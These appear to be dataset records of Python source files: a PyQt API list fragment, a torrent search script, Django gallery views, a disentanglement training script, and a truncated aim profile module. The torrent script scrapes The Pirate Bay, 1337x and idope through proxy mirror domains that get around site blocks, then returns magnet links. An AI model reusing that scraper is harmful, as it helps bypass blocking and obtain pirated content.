{"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 91, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 91, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 91, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.AlignHCenter", "line_number": 96, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 96, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.AlignVCenter", "line_number": 96, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.Checked", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.Unchecked", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 100, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.ItemIsSelectable", "line_number": 101, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 101, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.ItemIsEnabled", "line_number": 101, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt.ItemIsUserCheckable", "line_number": 101, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 102, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.yellow", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 102, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 114, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QBrush", "line_number": 119, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.red", "line_number": 119, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 119, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 107, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 122, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate", "line_number": 132, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 128, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate.fromString", "line_number": 156, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate", "line_number": 156, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 152, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate.fromString", "line_number": 163, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QDate", "line_number": 163, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 159, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 166, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 171, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 175, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 179, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.DoubleClicked", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 186, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.SelectedClicked", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.NoEditTriggers", "line_number": 188, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 188, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 183, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 191, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 195, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 199, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.SelectRows", "line_number": 205, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 205, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 203, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView.SelectItems", "line_number": 210, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QAbstractItemView", "line_number": 210, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 208, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.Checked", "line_number": 225, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 225, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 214, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.UserRole", "line_number": 248, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 248, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 232, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 257, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 257, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 260, "usage_type": "call"}]}
+{"seq_id": "228029764", "text": "import pyperclip\nfrom bs4 import BeautifulSoup\nimport requests\n# import magurn.proxy as proxy\n\nprint(\"Initializing....\")\n\n\ndef copyToClipBoard(text):\n pyperclip.copy(text)\n\n\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\"\n}\n\n# Takes about 5 seconds to get proxy url\n# piratebay_proxy_base_url = proxy.get_piratebay_proxy_url()\n\n\ndef check(search, link):\n srch_vrf = 0\n for nt in search.lower().split():\n if nt in link.text.lower():\n srch_vrf += 1\n if srch_vrf < len(search.lower().split()):\n return False\n else:\n return True\n\n\ndef _1337x(search):\n url_f = []\n search_l = search.split()\n search_name = \"+\".join(search_l)\n\n # base_url = \"https://1337x.to\"\n base_url = \"https://1337xto.eu\" # PROXIED URL\n req_url = base_url + \"/sort-search/\" + str(search_name) + \"/time/desc/1/\"\n try:\n res = requests.get(req_url, headers=headers)\n except:\n print(\"\\nERROR in accessing 1337x: Please Use VPN or Proxy\\n\")\n return\n soup = BeautifulSoup(res.content, features=\"html.parser\")\n c = False\n data_cnt = 0\n for row in soup.find_all(\"tr\"):\n if not c:\n c = True\n continue\n\n link_data = row.find_all(\"a\")\n link = link_data[1]\n\n if not check(search, link):\n continue\n\n url_f.append(base_url + link.get(\"href\"))\n names.append(link.text.strip())\n\n uploaded.append(row.find('td', attrs={'class': 'coll-date'}).text)\n\n size = row.find(\"td\", attrs={\"class\": \"size\"})\n sizes.append(size.find(text=True))\n\n data_cnt += 1\n if data_cnt == 2:\n break\n\n for url in url_f:\n url_res = requests.get(url, headers=headers)\n urlsoup = BeautifulSoup(url_res.content, features=\"html.parser\")\n for seed in urlsoup.find_all(\"span\", {\"class\": \"seeds\"}):\n seeds.append(int(seed.text))\n\n for magnet in urlsoup.find_all(\"a\"):\n try:\n if \"magnet\" in magnet.text.split()[0].lower():\n magnets.append(magnet.get(\"href\"))\n except:\n pass\n\n\ndef idope(search):\n url_f = []\n # base_url = \"https://idope.se\"\n base_url = \"https://gv6zipaqcoaau4qe.onio.icu\" # PROXIED URL\n req_url = base_url + \"/torrent-list/\" + str(search) + \"/?&o=-3\"\n try:\n res = requests.get(req_url, headers=headers)\n except:\n print(\"\\nERROR in accessing idope: Please Use VPN or Proxy\\n\")\n return\n\n soup = BeautifulSoup(res.content, features=\"html.parser\")\n\n data_cnt = 0\n for div in soup.find_all(\"div\", attrs={\"class\": \"resultdiv\"}):\n link = div.find(\"a\")\n\n if not check(search, link):\n continue\n\n uploaded.append(\n str(div.find('div', attrs={'class': 'resultdivbottontime'}).text) + \" Ago\")\n url_f.append(base_url + link.get(\"href\"))\n names.append(link.text.strip())\n\n seed = div.find(\"div\", {\"class\": \"resultdivbottonseed\"})\n seeds.append(int(seed.text))\n\n size = div.find(\"div\", {\"class\": \"resultdivbottonlength\"})\n sizes.append(size.text.strip().replace(u\"\\xa0\", u\" \"))\n\n data_cnt += 1\n if data_cnt == 2:\n break\n\n for url in url_f:\n url_res = requests.get(url, headers=headers)\n urlsoup = BeautifulSoup(url_res.content, features=\"html.parser\")\n for magnet in urlsoup.find_all(id=\"mangetinfo\"):\n magnets.append(magnet.text.strip())\n\n\ndef piratebay(search):\n url_f = []\n # base_url = \"https://thepiratebay.org\"\n base_url = \"https://247prox.link\" # PROXIED URL\n # base_url = piratebay_proxy_base_url\n\n req_url = base_url + \"/search/\" + search + \"/0/3/0\"\n try:\n res = requests.get(req_url, headers=headers)\n except:\n print(\"\\nERROR in accessing PirateBay: Please Use VPN or Proxy\\n\")\n return\n\n soup = BeautifulSoup(res.content, features=\"html.parser\")\n data_count = 0\n c = False\n for tr in soup.find_all(\"tr\"):\n if not c:\n c = True\n continue\n\n link = tr.div.a\n\n if not check(search, link):\n continue\n\n names.append(link.text.strip())\n\n url_f.append(str(base_url + link.get(\"href\")))\n\n size_data = tr.font.text.split(\",\")[1].strip()\n size_value = size_data.split()[1]\n size_type = size_data.split()[2].replace(\"i\", \"\")\n size = str(size_value + \" \" + size_type)\n sizes.append(size)\n\n td = tr.find_all(\"td\")\n seeds.append(int(td[-2].text))\n\n data_count += 1\n if data_count == 2:\n break\n\n for url in url_f:\n url_res = requests.get(url, headers=headers)\n urlsoup = BeautifulSoup(url_res.content, features=\"html.parser\")\n\n uploaded.append(urlsoup.find_all('dd')[-6].text.split()[0])\n\n div = urlsoup.find(\"div\", attrs={\"class\": \"download\"})\n\n magnets.append(div.a.get(\"href\"))\n\n\nwhile 1:\n tor_seed = {}\n names = []\n seeds = []\n magnets = []\n sizes = []\n uploaded = []\n\n searchterm = input(\"Enter the name of torrent you want to search\\n\")\n\n print(\"Scraping from idope....\")\n idope(searchterm)\n\n print(\"Scraping from 1337x....\")\n _1337x(searchterm)\n\n print(\"Scraping from PirateBay....\")\n piratebay(searchterm)\n\n if not len(names):\n print(\"\\nNothing Found\\n\")\n continue\n\n # Convert Sizes in MB\n size_in_mb = []\n for sizedata in sizes:\n sizesplit = sizedata.split()\n size = float(sizesplit[0])\n type_size = sizesplit[1]\n if type_size == \"B\":\n size_mb = size / (1024 * 1024)\n if type_size == \"KB\":\n size_mb = size / 1024\n if type_size == \"MB\":\n size_mb = size\n if type_size == \"GB\":\n size_mb = size * 1024\n if type_size == \"TB\":\n size_mb = size * 1024 * 1024\n size_in_mb.append(size_mb)\n\n score = []\n for i in range(len(sizes)):\n score.append(seeds[i]/size_in_mb[i])\n\n tor_seed[\"Names\"] = names\n tor_seed[\"Sizes\"] = sizes\n tor_seed[\"Seeders\"] = seeds\n tor_seed[\"Uploaded\"] = uploaded\n tor_seed[\"SizesMB\"] = size_in_mb\n tor_seed[\"Magnets\"] = magnets\n tor_seed[\"Score\"] = score\n\n maxIndex = score.index(max(score))\n\n print(\"Name: \" + tor_seed[\"Names\"][maxIndex])\n print(\"Size: \" + tor_seed[\"Sizes\"][maxIndex])\n print(\"Seeds:\", tor_seed[\"Seeders\"][maxIndex])\n print(\"Uploaded:\", tor_seed[\"Uploaded\"][maxIndex])\n print(\"Magnet Link:\\n\" + tor_seed[\"Magnets\"][maxIndex])\n try:\n copyToClipBoard(tor_seed[\"Magnets\"][maxIndex])\n print(\"Magnet Copied to ClipBoard\")\n except:\n pass\n print(\"\\nPress Ctrl+C to Close\\n\")\n", "sub_path": "magurn/TorrentSearch.py", "file_name": "TorrentSearch.py", "file_ext": "py", "file_size_in_byte": 6812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pyperclip.copy", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 72, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 73, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 91, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 96, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 121, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 122, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 135, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 140, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 171, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 172, "usage_type": "call"}]}
+{"seq_id": "466391873", "text": "from django.shortcuts import render #rendering of templates\nfrom django.http import HttpRequest #handles the post and the get methods from the user\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger #handles massive pages\nfrom django.views.generic import DetailView#allows detailed view for album\nfrom .email import send_welcome_email#imports the function that allows sending email to different recepients\nfrom app.models import Album, AlbumImage#importing from our models the classes album and albumimage\n\n\ndef gallery(request):\n #desplaying the albums as list of pages containining 10 albums per page\n list = Album.objects.filter(is_visible=True).order_by('-created')\n paginator = Paginator(list, 10)\n\n page = request.GET.get('page')\n try:\n albums = paginator.page(page)\n except PageNotAnInteger:\n albums = paginator.page(1) # If page is not an integer, deliver first page.\n except EmptyPage:\n albums = paginator.page(paginator.num_pages) # If page is out of range (e.g. 9999), deliver last page of results.\n\n return render(request, 'gallery.html', { 'albums': list })\n\n#defining the newletter function\ndef newsletter(request):\n name = request.POST.get('your_name')\n email = request.POST.get('email')\n\n recipient = NewsLetterRecipients(name=name, email=email)\n recipient.save()\n send_welcome_email(name, email) #sending the newsletter email to the resipient with the details provided\n data = {'success': 'You have been successfully added to mailing list'}\n return JsonResponse(data)\n\nclass AlbumDetail(DetailView):#defines what should be presented in the detail view\n model = Album\n\n def get_context_data(self, **kwargs):# accept declaring a variables and the amount within the function arguments\n # Call the base implementation first to get a context\n context = super(AlbumDetail, self).get_context_data(**kwargs)# accept declaring a variables and the amount within the function arguments\n # Add in a QuerySet of all the images\n context['images'] = AlbumImage.objects.filter(album=self.object.id)\n return context\ndef search_results(request):#searching album by tittle \n\n if 'album' in request.GET and request.GET[\"album\"]:\n search_term = request.GET.get(\"album\")#brings the album\n searched_albums = Album.search_by_title(search_term)#brings the tittle in the brought album\n message = f\"{search_term}\"\n\n return render(request, 'search.html',{\"message\":message,\"albums\": searched_albums})\n\n else:#define what happens if the album is not found\n message = \"You haven't searched for any term\"\n return render(request, 'search.html',{\"message\":message})\n\n\ndef handler404(request, exception):#handle the not found errors\n assert isinstance(request, HttpRequest)\n return render(request, 'handler404.html', None, None, 404)", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2905, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "app.models.Album.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "app.models.Album.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "app.models.Album", "line_number": 11, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 12, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 17, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 19, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "email.send_welcome_email", "line_number": 31, "usage_type": "call"}, {"api_name": "django.views.generic.DetailView", "line_number": 35, "usage_type": "name"}, {"api_name": "app.models.Album", "line_number": 36, "usage_type": "name"}, {"api_name": "app.models.AlbumImage.objects.filter", "line_number": 42, "usage_type": "call"}, {"api_name": "app.models.AlbumImage.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.models.AlbumImage", "line_number": 42, "usage_type": "name"}, {"api_name": "app.models.Album.search_by_title", "line_number": 48, "usage_type": "call"}, {"api_name": "app.models.Album", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 51, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpRequest", "line_number": 59, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "451554588", "text": "#!/usr/bin/python\n#-*- coding: utf-8 -*-\n\n# >.>.>.>.>.>.>.>.>.>.>.>.>.>.>.>.\n# Licensed under the Apache License, Version 2.0 (the \"License\")\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# --- File Name: main_group_v2.py\n# --- Creation Date: 29-09-2020\n# --- Last Modified: Wed 07 Oct 2020 02:50:28 AEDT\n# --- Author: Xinqi Zhu\n# .<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<\n\"\"\"\nMain training for GroupV2VAE.\nCode borrowed from disentanglement_lib.\n\"\"\"\n\n# We group all the imports at the top.\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport sys\n# Insert disentanglement_lib to path.\nsys.path.insert(\n 0,\n os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))),\n 'disentanglement_lib'))\nfrom disentanglement_lib.config import reproduce\nfrom disentanglement_lib.evaluation import evaluate\nfrom disentanglement_lib.evaluation.metrics import utils\nfrom disentanglement_lib.methods.unsupervised import train\nfrom disentanglement_lib.methods.unsupervised import vae\nfrom disentanglement_lib.postprocessing import postprocess\nfrom disentanglement_lib.utils import aggregate_results\nfrom disentanglement_lib.visualize import visualize_model\nfrom disentanglement_lib.utils import resources\nimport argparse\nimport glob\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nimport gin.tf\n\nfrom group_v2_models import GroupV2VAE\nfrom group_v2_architectures import group_v2_deconv_decoder\nfrom utils import _str_to_bool\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Project description.')\n parser.add_argument('--result_dir',\n help='Results directory.',\n type=str,\n default='/mnt/hdd/repo_results/Ramiel/group_v2_sweep')\n parser.add_argument('--study',\n help='Name of the study.',\n type=str,\n default='unsupervised_study_v1')\n parser.add_argument('--eval_only',\n help='Whether to train.',\n type=_str_to_bool,\n default=False)\n parser.add_argument('--model_gin',\n help='Name of the gin config.',\n type=str,\n default='group_v2_model.gin')\n parser.add_argument('--hyps',\n help='Hyperparameters of gmat_hes_lin_seed.',\n type=str,\n default='0_0_0_1_0')\n parser.add_argument('--group_feats_size',\n help='Hyperparameters of group_feats_size.',\n type=str,\n default='400')\n parser.add_argument('--lie_alg_init_scale',\n help='Hyperparameters of lie_alg_init_scale.',\n type=str,\n default='0.001')\n parser.add_argument('--lie_alg_init_type',\n help='Hyperparameters of lie_alg_init_type.',\n type=str,\n default='none')\n parser.add_argument('--n_act_points',\n help='Hyperparameters of n_act_points.',\n type=str,\n default='10')\n parser.add_argument('--overwrite',\n help='Whether to overwrite output directory.',\n type=_str_to_bool,\n default=False)\n parser.add_argument('--dataset',\n help='Dataset.',\n type=str,\n default='dsprites_full')\n parser.add_argument('--recons_type',\n help='Reconstruction loss type.',\n type=str,\n default='bernoulli_loss')\n args = parser.parse_args()\n\n # 1. Settings\n study = reproduce.STUDIES[args.study]\n args.hyps = args.hyps.split('_')\n print()\n study.print_postprocess_config()\n print()\n study.print_eval_config()\n\n gpus = tf.config.experimental.list_physical_devices('GPU')\n if gpus:\n try:\n # Currently, memory growth needs to be the same across GPUs\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(logical_gpus),\n \"Logical GPUs\")\n except RuntimeError as e:\n # Memory growth must be set before GPUs have been initialized\n print(e)\n\n # Call training module to train the custom model.\n dir_name = \"GroupV2VAE-\" + \"-\".join(args.hyps) + \\\n '-' + args.lie_alg_init_type + \\\n '-' + str(args.lie_alg_init_scale) + \\\n '-' + str(args.group_feats_size)\n output_directory = os.path.join(args.result_dir, dir_name)\n model_dir = os.path.join(output_directory, \"model\")\n gin_bindings = [\n \"GroupV2VAE.hy_gmat = \" + args.hyps[0],\n \"GroupV2VAE.hy_hes = \" + args.hyps[1],\n \"GroupV2VAE.hy_lin = \" + args.hyps[2],\n \"group_v2_deconv_decoder.hy_ncut = \" + args.hyps[3],\n \"group_v2_deconv_decoder.group_feats_size = \" + args.group_feats_size,\n \"group_v2_deconv_decoder.lie_alg_init_scale = \" + args.lie_alg_init_scale,\n \"group_v2_deconv_decoder.lie_alg_init_type = '\" + args.lie_alg_init_type + \"'\",\n \"group_v2_deconv_decoder.n_act_points = \" + args.n_act_points,\n \"model.random_seed = \" + args.hyps[4],\n \"dataset.name = '\" + args.dataset + \"'\",\n \"reconstruction_loss.loss_fn = @\" + args.recons_type\n ]\n if not args.eval_only:\n train.train_with_gin(model_dir, args.overwrite, [args.model_gin],\n gin_bindings)\n\n # We fix the random seed for the postprocessing and evaluation steps (each\n # config gets a different but reproducible seed derived from a master seed of\n # 0). The model seed was set via the gin bindings and configs of the study.\n random_state = np.random.RandomState(0)\n\n # We extract the different representations and save them to disk.\n postprocess_config_files = sorted(study.get_postprocess_config_files())\n for config in postprocess_config_files:\n post_name = os.path.basename(config).replace(\".gin\", \"\")\n print(\"Extracting representation \" + post_name + \"...\")\n post_dir = os.path.join(output_directory, \"postprocessed\", post_name)\n postprocess_bindings = [\n \"postprocess.random_seed = {}\".format(random_state.randint(2**32)),\n \"postprocess.name = '{}'\".format(post_name)\n ]\n postprocess.postprocess_with_gin(model_dir, post_dir, args.overwrite,\n [config], postprocess_bindings)\n\n # Iterate through the disentanglement metrics.\n eval_configs = sorted(study.get_eval_config_files())\n blacklist = ['downstream_task_logistic_regression.gin']\n # blacklist = [\n # 'downstream_task_logistic_regression.gin', 'beta_vae_sklearn.gin',\n # 'dci.gin', 'downstream_task_boosted_trees.gin', 'mig.gin',\n # 'modularity_explicitness.gin', 'sap_score.gin', 'unsupervised.gin'\n # ]\n for config in postprocess_config_files:\n post_name = os.path.basename(config).replace(\".gin\", \"\")\n post_dir = os.path.join(output_directory, \"postprocessed\", post_name)\n # Now, we compute all the specified scores.\n for gin_eval_config in eval_configs:\n if os.path.basename(gin_eval_config) not in blacklist:\n metric_name = os.path.basename(gin_eval_config).replace(\n \".gin\", \"\")\n print(\"Computing metric \" + metric_name + \" on \" + post_name +\n \"...\")\n metric_dir = os.path.join(output_directory, \"metrics\",\n post_name, metric_name)\n eval_bindings = [\n \"evaluation.random_seed = {}\".format(\n random_state.randint(2**32)),\n \"evaluation.name = '{}'\".format(metric_name)\n ]\n evaluate.evaluate_with_gin(post_dir, metric_dir,\n args.overwrite, [gin_eval_config],\n eval_bindings)\n\n # We visualize reconstructions, samples and latent space traversals.\n visualize_dir = os.path.join(output_directory, \"visualizations\")\n visualize_model.visualize(model_dir, visualize_dir, args.overwrite)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "main_group_v2.py", "file_name": "main_group_v2.py", "file_ext": "py", "file_size_in_byte": 8653, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.path.insert", "line_number": 26, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.realpath", "line_number": 28, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 51, "usage_type": "call"}, {"api_name": "utils._str_to_bool", "line_number": 62, "usage_type": "name"}, {"api_name": "utils._str_to_bool", "line_number": 90, "usage_type": "name"}, {"api_name": "disentanglement_lib.config.reproduce.STUDIES", "line_number": 103, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.config.reproduce", "line_number": 103, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.config.experimental.list_physical_devices", "line_number": 110, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.config", "line_number": 110, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 110, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.config.experimental.set_memory_growth", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.config", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 115, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.config.experimental.list_logical_devices", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.config", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1", "line_number": 116, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.methods.unsupervised.train.train_with_gin", "line_number": 144, "usage_type": "call"}, {"api_name": "disentanglement_lib.methods.unsupervised.train", "line_number": 144, "usage_type": "name"}, {"api_name": "numpy.random.RandomState", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 150, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.postprocessing.postprocess.postprocess_with_gin", "line_number": 162, "usage_type": "call"}, {"api_name": "disentanglement_lib.postprocessing.postprocess", "line_number": 162, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 175, "usage_type": "call"}, {"api_name": "os.path", "line_number": 175, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path", "line_number": 178, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 179, "usage_type": "call"}, {"api_name": "os.path", "line_number": 179, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.evaluation.evaluate.evaluate_with_gin", "line_number": 190, "usage_type": "call"}, {"api_name": "disentanglement_lib.evaluation.evaluate", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "disentanglement_lib.visualize.visualize_model.visualize", "line_number": 196, "usage_type": "call"}, {"api_name": "disentanglement_lib.visualize.visualize_model", "line_number": 196, "usage_type": "name"}]}
+{"seq_id": "472366304", "text": "import os\nimport json\nimport re\n\nfrom aim.engine.utils import random_str\nfrom aim.engine.configs import (\n AIM_PROFILE_NAME,\n AIM_PROFILE_SSH_DIR_NAME,\n AIM_PROFILE_CONFIG_FILE_NAME,\n)\n\n\nclass AimProfile:\n @staticmethod\n def get_path():\n \"\"\"\n Returns aim profile path, by default at user's home directory\n \"\"\"\n home_path = os.path.expanduser('~')\n aim_profile_path = os.path.join(home_path, AIM_PROFILE_NAME)\n\n return aim_profile_path\n\n def __init__(self):\n self.path = self.get_path()\n self.config_path = os.path.join(self.path, AIM_PROFILE_CONFIG_FILE_NAME)\n self.ssh_path = os.path.join(self.path, AIM_PROFILE_SSH_DIR_NAME)\n self._config = {}\n\n if not os.path.isdir(self.path):\n self.init()\n\n @property\n def config(self):\n \"\"\"\n Config property getter, loads config file if not already loaded and\n returns json object\n \"\"\"\n if len(self._config) == 0:\n if os.path.isfile(self.config_path):\n with open(self.config_path, 'r') as f:\n config = json.load(f)\n self._config = config\n return self._config\n\n @config.setter\n def config(self, config):\n self._config = config\n\n def save_config(self):\n \"\"\"\n Saves object config to config file\n \"\"\"\n with open(self.config_path, 'w') as f:\n f.write(json.dumps(self._config))\n\n def init(self):\n \"\"\"\n Inits aim profile at default path\n \"\"\"\n # Create profile dir\n os.mkdir(self.path)\n\n # Create ssh dir\n os.mkdir(self.ssh_path)\n\n # Create known_hosts file inside ssh dir\n open(os.path.join(self.ssh_path, 'known_hosts'), 'w').close()\n\n # Create profile config file\n with open(self.config_path, 'w') as profile_file:\n profile_file.write(json.dumps({\n 'auth': {},\n }))\n\n def is_auth(self, remote):\n \"\"\"\n Returns `True` if profile has authentication keys for `remote`,\n `False` otherwise\n \"\"\"\n return self.config['auth'].get(remote) is not None\n\n def get_username(self):\n \"\"\"\n Returns username or None\n \"\"\"\n user = self.config.get('user')\n if user:\n return user.get('username')\n return None\n\n def set_username(self, username):\n \"\"\"\n Sets username\n \"\"\"\n if not isinstance(username, str):\n raise TypeError()\n\n if not re.match(r'^[A-Za-z0-9_\\-]{2,}$', username):\n raise AttributeError()\n\n self.config.setdefault('user', {})\n self.config['user']['username'] = username.strip()\n self.save_config()\n\n # def auth(self, remote):\n # \"\"\"\n # Generates RSA key pair for `remote` authentication\n # \"\"\"\n # remote = remote.strip()\n # private_file_name = 'rsa_{r}'.format(o=remote,\n # r=random_str(16))\n # private_key_path = 